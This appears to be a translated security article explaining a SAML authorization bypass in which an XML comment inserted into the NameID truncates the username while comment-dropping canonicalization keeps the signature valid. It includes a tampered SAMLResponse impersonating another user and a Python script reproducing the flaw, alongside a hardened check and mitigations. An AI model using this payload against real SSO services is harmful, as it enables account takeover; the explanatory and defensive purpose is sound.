
SAML authorization bypass



A vulnerability has been discovered in several implementations of SAML (Security Assertion Markup Language) that lets an attacker bypass authorization and log in to a service as another user. It affects solutions from a number of SSO providers and several libraries that implement SAML SSO (Single Sign-On).


SAML (Security Assertion Markup Language) is an open, XML-based standard for exchanging authentication and authorization data between the parties to a login, typically an identity provider (IdP) and a service provider (SP). Using SAML, a user can reach many cloud applications with a single login and password. Single Sign-On (SSO) is the widespread technology that lets a user log in to a web application through a third party (the identity provider) instead of with credentials held by the application itself.


It is in these implementations that the error lies: an attacker can place an XML comment inside the username (NameID) field of a SAML response, and the only precondition is that the attacker holds a valid account (username) at the identity provider.


The problem lies in how comments in the XML markup are processed. When a comment is placed inside the username value, the text is split into two text nodes around the comment. When the service provider reads the username, its parser takes only the first text node and "cuts off" everything after the comment, so the value that is checked is the truncated one:


    import lxml.etree as et  # libxml2-based parser: the comment stays in the tree as a child node

    def name_id(doc):
        data = et.fromstring(doc)
        return data.text  # only the text node before the first child (the comment)

    name_id("<NameID>test<!-- comment -->user</NameID>")  # returns 'test', not 'testuser'
    # note: xml.etree.ElementTree drops comments by default and would return 'testuser' here

The expected value is "testuser", but because of the split only "test" is returned.


An example of the attack: a user who controls the account user@user.com.evil.com can modify the SAML response so that the service provider, when processing it, reads the NameID as user@user.com:


    <SAMLResponse>
      <Issuer>https://idp.com/</Issuer>
      <Assertion ID="_id1234">
        <Subject>
          <NameID>user@user.com<!---->.evil.com</NameID>
        </Subject>
      </Assertion>
      <Signature>
        <SignedInfo>
          <CanonicalizationMethod Algorithm="xml-c14n11"/>
          <Reference URI="#_id1234"/>
        </SignedInfo>
        <SignatureValue>
          some base64 data that represents the signature of the assertion
        </SignatureValue>
      </Signature>
    </SAMLResponse>

The signature stays valid. The referenced assertion is digested after canonicalization, and standard XML canonicalization (xml-c14n, exc-c14n) discards comments, so the canonical form of the modified assertion is byte-for-byte the one the identity provider signed. The service provider, however, reads the NameID from the parsed (non-canonicalized) document and gets only user@user.com.
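The following Python script is a worked example added to this article; it is not code from the original article or from any of the affected libraries. It reproduces both the parsing bug shown above (the comment splitting the username) and the reason the modified response still passes the signature check. It uses only the standard library (Python 3.8 or later): the TreeBuilder is told to keep comments in the tree so that it behaves like the affected parsers, and ET.canonicalize produces the canonical form that a Reference digest covers. The NameID strings are constructed from the example above, and the function names are illustrative.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample input (not from the article or any real IdP): the NameID the
# IdP signed for the attacker's own account, and the same NameID after the
# attacker inserts an empty comment so that a naive parser reads the victim's name.
SIGNED_NAME_ID = "<NameID>user@user.com.evil.com</NameID>"
TAMPERED_NAME_ID = "<NameID>user@user.com<!---->.evil.com</NameID>"


def parse_keeping_comments(xml):
    # The affected libraries keep comments as child nodes of the element. The
    # stdlib parser drops them unless asked to keep them, so this mimics them.
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(xml, parser=parser)


def vulnerable_name_id(xml):
    # Element.text holds only the text node before the first child, so the part
    # of the username after the comment is silently dropped.
    return parse_keeping_comments(xml).text


def safe_name_id(xml):
    # A NameID is plain text. Any child node (comment, PI, element) means the
    # value is not the single string the IdP asserted, so reject it outright
    # rather than trying to repair it.
    element = parse_keeping_comments(xml)
    if len(element) != 0:
        raise ValueError("NameID contains child nodes; refusing to extract a name")
    return element.text or ""


def canonical_form(xml, with_comments):
    # Standard C14N (with_comments=False) discards comments; the "#WithComments"
    # variants of the canonicalization algorithms keep them.
    return ET.canonicalize(xml, with_comments=with_comments)


def c14n_digest(xml, with_comments):
    # SHA-256 over the canonical form, which is what a signed Reference's
    # DigestValue covers.
    canonical = canonical_form(xml, with_comments)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def comment_injection_survives_signature(signed, tampered):
    # True if the tampered element still matches the digest the IdP signed, i.e.
    # the signature would verify even though the extracted name has changed.
    return c14n_digest(signed, False) == c14n_digest(tampered, False)


if __name__ == "__main__":
    print("vulnerable parser sees:", vulnerable_name_id(TAMPERED_NAME_ID))
    print("digest unchanged under plain C14N:",
          comment_injection_survives_signature(SIGNED_NAME_ID, TAMPERED_NAME_ID))
    print("digest unchanged under C14N with comments:",
          c14n_digest(SIGNED_NAME_ID, True) == c14n_digest(TAMPERED_NAME_ID, True))
    try:
        safe_name_id(TAMPERED_NAME_ID)
    except ValueError as err:
        print("hardened parser:", err)
```

Running the script shows the two halves of the bug together: the plain-C14N digests of the signed and tampered NameID are identical, so the signature verifies, while the vulnerable extraction returns user@user.com. Canonicalizing with comments kept changes the digest, which is why a "#WithComments" algorithm closes the gap on the signature side; the strict NameID check closes it on the parsing side.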

The following solutions are subject to this attack:



It is worth noting that the attack does not work against accounts protected by two-factor authentication (which, according to Google's statistics, is enabled by roughly 10% of users).


To prevent such attacks, update the affected libraries, disable public self-registration of user accounts on important networks (the attacker needs an account of their own at the identity provider), or switch to a canonicalization algorithm that does not discard comments (the #WithComments variants of xml-c14n and exc-c14n), so that an inserted comment invalidates the signature.



Source: https://habr.com/ru/post/350234/

